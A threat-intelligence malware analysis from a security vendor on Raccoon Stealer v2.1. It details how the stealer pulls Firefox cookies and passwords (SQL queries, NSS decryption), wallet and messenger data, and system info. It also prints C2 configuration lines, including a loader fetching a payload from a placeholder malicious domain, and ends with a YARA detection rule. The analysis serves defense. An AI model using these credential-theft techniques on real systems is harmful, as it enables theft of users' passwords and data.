eSentire Threat Intelligence Malware Analysis: Raccoon Stealer v2, Part 2

In August 2022, the eSentire Threat Response Unit (TRU) team released a blog providing a brief overview of the new Raccoon Stealer version 2. In the previous blog, we mentioned the loss of the lead developer for the stealer; he was also believed to be responsible for critical operations within the stealer’s functionality. In 2023, TRU has continued to observe Raccoon Stealer v2 incidents, specifically targeting manufacturing and software industries.

This malware analysis delves deeper into the technical details of how the Raccoon Stealer malware operates and our security recommendations to protect your organization from being exploited.

Case Study Raccoon Stealer 2.0

On November 2021, Mark Sokolovsky, a Ukrainian national, was charged in an International Cybercrime Operation related to Raccoon Infostealer operations. According to the U.S. Department of Justice (DOJ), Mark used pseudonyms such as raccoonstealer, Photix, and black21jack77777 on forums.

According to KrebsOnSecurity, the leading developer of the stealer made a mistake by linking his Gmail account, under the nickname 'Photix' on a cybercrime forum, to an iCloud account, thereby exposing his real identity. United States Department of Justice launched a website where users can check whether their emails have been stolen by the stealer.

On March 25^th, 2022, Raccoon Stealer stopped its operations, aligning with the timeline of Mark’s arrest. However, during the period of absence, Raccoon Stealer continued to undergo active development. On June 1, 2022, Raccoon Stealer resumed its operations and released the beta version of Raccoon Stealer 2.0. Currently, Raccoon Stealer remains active, with more members added to their support team.

In 2023, eSentire’s Threat Response Unit (TRU) has continued to observe Raccoon Stealer v2 incidents, specifically targeting manufacturing and software industries.

On February the 2^nd, 2023, Raccoon Stealer officially exited Beta testing and announced the release of Raccoon Stealer v.2.1 (Figure 1).

The updated version includes features such as Signal Messenger data collection, cleaning from Defender detection (likely changing the code, obfuscation to avoid detections), and auto brute-forcing for cryptowallets (Figure 2).

Raccoon Stealer 2.1 Analysis

Compared to the previous version, the panel is slightly updated. Now the configuration includes the ability to enable Discord and Signal data staging (Figure 3).

The builder can be generated as an exe or DLL. The DLL runs with an ordinal #1 or “_Start@16”. The original name you can find in the Raccoon Stealer v2.1 DLL binary is “Raccoon-2.dll” (Figure 4).

We were able to retrieve 62 samples containing DLL payloads on VirusTotal. The signers being used on the DLL payloads were:

For this blog, we analyzed Raccoon Stealer build (2.1.0-4.exe), MD5: 59b3f1bab2aee7c6ded44ab444c93d6b. Unlike other stealers such as Aurora Stealer, Raccoon Stealer is only capable of generating 32-bit builds.

The latest build of Raccoon Stealer uses the XOR encryption algorithm instead of RC4 (Figure 5).

Each string is encrypted with a different XOR key. The XOR function loops through each byte in the data list and XORs it with the corresponding byte in the key list. If the data is shorter than the key, it will wrap around to the beginning of the data and continue XORing with bytes from there (Figure 6).

The latest versions of Racoon Stealer use API hammering technique to evade detections and hinder the analysis by researchers. In the API hammering technique, the stealer repeatedly calls a single API function (e.g., PathIsSlowW, RealDriveType) in a tight loop, causing a high volume of calls to that function. This can cause the behavior of the malware to be overlooked or obscured by legitimate API calls, making it more difficult to detect the malicious code, which can be blended in within the API loop. We can use this script written by a Security Researcher at RecordedFuture to erase the API calls whose counts exceeds 400.

The function shown below (Figure 10) is responsible for loading functions using GetProcAddress from a DLL library at runtime.

The stealer looks for the presence of the mutex “AYAYAYAY1337,” and if the string is found, the stealer exits; this is done to ensure that only one instance of the stealer is running on the system. The mutex string correlates with the user-agent string found within the traffic capture (Figure 11).

The stealer checks if the current process is running under Local System privileges (Figure 12). The SID can be retrieved from the GetTokenInformation function, specifically the TOKEN_USER structure (TokenUser). The binary then compares the retrieved SID with SID S-1-5-18 (SYSTEM account).

The TOKEN_USER structure:

typedef struct _TOKEN_USER {
  SID_AND_ATTRIBUTES User;
} TOKEN_USER, *PTOKEN_USER;

If the current running process has local system privileges, the stealer searches for a process with the name explorer.exe, obtains its access token, duplicates it, and then uses that token to create a new process with the same access rights as the original process (Local System privileges), this is possibly implemented for privilege elevation purposes (Figure 13).

The MachineGuid is obtained from the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography, the GUID is then added to the “System Info” text file as a part of the User ID in the exfiltrated logs (Figure 14).

As an example of parsing the browsing data, the stealer retrieves information about the cookies stored in cookies.sqlite database file in Firefox, including:

• The hostname of the website that set the cookie,
• The path of the website,
• Whether the cookie is secure or not,
• The expiration time of the cookie,
• The name of the cookie, and
• Its value with the SQL query string “SELECT host, path, isSecure, expiry, name, value FROM moz_cookies” using functions such as sqlite3_prepare_v2 from SQLite database library.

The function below is responsible for getting the path of the formhistory.sqlite file within Firefox, then it attempts to copy the file into AppData/LocalLow folder under a randomly generated name (Figure 15 & Figure 16). The function that randomly generates the filename is using the SystemFunction036 function, taking 12 characters as the size for the name. If it fails to copy or read the file – it deletes it.

The SQL database is accessed via the sqlite3_open16 function provided by the SQLite library. Then the sqlite3_prepare_v2 is called out to prepare an SQL statement to be executed by SQLite, which in our case is “SELECT host, path, isSecure, expiry, name, value FROM moz_cookies”.

The SQL query is used to retrieve data from the “moz_cookies” table in Firefox’s cookies database. This query selects the columns “host”, “path”, “isSecure”, “expiry”, “name”, and “value” for all rows in the table. This data includes information about website domains, the paths of web pages, whether the cookie is secure or not, the expiration time of the cookie, and the cookie name and value.

The stealer performs similar operation with extracting the encrypted credentials from the perspective of copying the logins.json file into the AppData/LocalLow folder.

encryptedUsername, encryptedPassword, guid, httpRealm, and hostname are the values in the logins.json file that the stealer is looking for, shown below in Figure 17.

If the file can be copied, the stealer reads the content of the copied file and attempts to decrypt the encrypted passwords using the functions from the Mozilla NSS library.

In short, this is how the password and username decryption work based on the decompiled code: the binary obtains the internal key slot using the PK11_GetInternalKeySlot function. This function is used to obtain a handle to the internal key slot. The key slot is used to store cryptographic keys that are used to encrypt and decrypt data.

The PK11_Authenticate function is then called to authenticate the key slot. This function is used to verify that the application is authorized to use the key stored in the slot. PK11SDR_Decrypt is used to decrypt data using the key stored in the key slot. The function takes as input the encrypted data, a pointer to the decrypted data buffer, the length of the decrypted data buffer, and the encryption algorithm and mode to use for decryption (Figure 18).

After successfully decrypting the encrypted data, the username and password are parsed in the format:

URL: <URL>
USR: <Username>
PASS: <Password>

The same operation is done with the browsing history – the file is copied into AppData/LocalLow. The history is extracted via the “SELECT fieldname, value FROM moz_formhistory” SQL query (Figure 20).

The function below retrieves autofill data via the SQL query “SELECT name, value FROM autofill” (Figure 21).

The snippet below copies the prefs.js to an AppData\LocalLow folder and looks for the MetaMask browser extension reference within the copied prefs.js file (a preference file that also includes settings and preferences for any add-ons or extensions installed in the browser). It then accesses the storage\default path to extract the MetaMask data within the IDB folder (Figures 22 - 23).

The stealer gets the list of the installed applications by accessing the registry key "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall", specifically the DisplayName key (Figure 24).

The stealer also retrieves the number of processors on the infected machine and writes it to a “System Info” file using the format “- CPU: %s (%d cores)”, where %s represents the processor name and %d is the number of cores (Figure 26).

The information on the version of the Windows operating system is obtained by accessing the registry key "SOFTWARE\Microsoft\Windows NT\CurrentVersion", specifically the key “ProductName”. The result is written to the “System Info” file under “OS: “, shown in Figure 27 below.

This code below checks if the operating system is 64-bit or 32-bit and adds the result to a string “Architecture: “. It sets v1 to 1 if the OS is 64-bit, which means that the binary was able to retrieve the path of the system directory used by WOW64 (the directory is not present on 32-bit systems), and 0 otherwise (Figure 28).

The time zone information is retrieved via the API GetTimeZoneInformation. The system locale is obtained via GetLocaleInfoW and GetUserDefaultLCID functions, system's RAM (Random Access Memory) is obtained via the GlobalMemoryStatusEx function.

C2 Communication

In the previous blog, we described how Raccoon Stealer transmits data to the C2 channel.

The stealer configuration can be observed in the traffic capture (Figure 29).

scrnsht_Screenshot.jpeg:1 (Screenshot capture enabled)

tlgrm_Telegram:Telegram Desktop\tdata|*|*emoji*,*user_data*,*tdummy*,*dumps* (Telegram data)

sgnl_Signal:Signal|*|stickers.*,*cache*,*Cache*,*.exe (Signal Messenger data)

dscrd_Discord:discord\Local Storage\leveldb|*.log,*.ldb|- (Discord data)

grbr_Desktop:%USERPROFILE%\Desktop\|*.txt|*windows*, *recycle|100|1|1|files (Configuration of the Grabber module where 100 is the maximum file size in KB to grab, 1 – recursive search enabled, 1 – shortcuts enabled)

ldr_2: https://<malicious.domain> /payload.dll|%APPDATA%|dll (Example of the Loader module configuration including the folder where the secondary file is dropped and the extension of the file)

As we can see, apart from the Signal data exfiltration, API hammering, and XOR encryption, there are no significant updates in the newest build. However, the stealer is still under active development and support.

We wrote the C2 and the mutex extractor for the latest Raccoon Stealer build and the IDAPython script to decrypt the encrypted strings.

Recommendations from eSentire's Threat Response Unit (TRU)

We recommend implementing the following controls to help secure your organization against Raccoon Stealer malware: 

• Confirm that all devices are protected with Endpoint Detection and Response (EDR) solutions.
• Implement a Phishing and Security Awareness Training (PSAT) program that educates and informs your employees on emerging threats in the threat landscape.  
• Encourage your employees to use password managers instead of using the password storage feature provided by web browsers. Use master passwords where it’s applicable.

While the TTPs used by threat actor(s) grow in sophistication, they lead to a certain level of difficulties at which critical business decisions must be made. Preventing the various attack technique and tactics utilized by the modern threat actor requires actively monitoring the threat landscape, developing and deploying endpoint detections, and the ability to investigate logs & network data during active intrusions. 

eSentire TRU is a world-class team of threat researchers who develop new detections enriched by original threat intelligence and leverage new machine learning models that correlate multi-signal data and automate rapid response to advanced threats.  

If you are not currently engaged with an MDR provider, eSentire MDR can help you reclaim the advantage and put your business ahead of disruption. Learn what it means to have an elite team of Threat Hunters and Researchers that works for you. Connect with an eSentire Security Specialist. 

Yara rule

rule RaccoonStealerv2 {
    meta:
        author = "eSentire Threat Intelligence team"
        date = "04/17/2023"
        description = "Detects the latest unpacked/unobfuscated build 2.1.0-4"
    strings:
        $pattern1 = {B9 ?? ?? ?? 00 E8 ?? ?? ?? 00 ?? ?? 89 45 E8}
        $pattern2 = {68 ?? ?? ?? 00 ?? 68 01 00 1F 00}
        $pattern3 = {68 ?? ?? ?? 00 ?? ?? 68 01 00 1F 00 FF 15 64 ?? ?? 00}
        $m1 = {68 ?? ?? ?? 00 ?? 00 68 01 00 1f 00 ff 15 64 ?? ?? 00}
        $m2 = {68 ?? ?? ?? 00 ?? 68 01 00 1f 00 ff 15 64 ?? ?? 00}
    condition:
        2 of ($pattern*) and uint16(0) == 0x5A4D and 1 of ($m*) and uint32(uint32(0x3C)) == 0x00004550 and filesize < 200KB
}

The payloads with the latest build can be obtained here.

MITRE ATT&CK

References

• https://www.justice.gov/usao-wdtx/pr/newly-unsealed-indictment-charges-ukrainian-national-international-cybercrime-operation
• https://www.justice.gov/usao-wdtx/page/file/1546636/download
• https://krebsonsecurity.com/2022/10/accused-raccoon-malware-developer-fled-ukraine-after-russian-invasion/
• https://raccoon.ic3.gov/home
• https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-raccoon-stealer-v2-0
• https://github.com/RussianPanda95/Malware/blob/main/RaccoonStealer_v2/RaccoonStealerv2_DLL_payloads_MD5
• https://github.com/N1ght-W0lf/MalwareAnalysis/blob/master/RaccoonV2/defeat_api_hammering.py
• https://learn.microsoft.com/en-us/windows/win32/api/
• https://github.com/RussianPanda95/Configuration_extractors/blob/main/raccoonstealerv2_c2_mutex_extract.py
• https://github.com/RussianPanda95/IDAPython/blob/main/RaccoonStealer/raccoon_stealer_string_decrypt_IDAPython.py
• https://github.com/RussianPanda95/Malware/blob/main/RaccoonStealer_v2/RaccoonStealerv2_DLL_payloads_MD5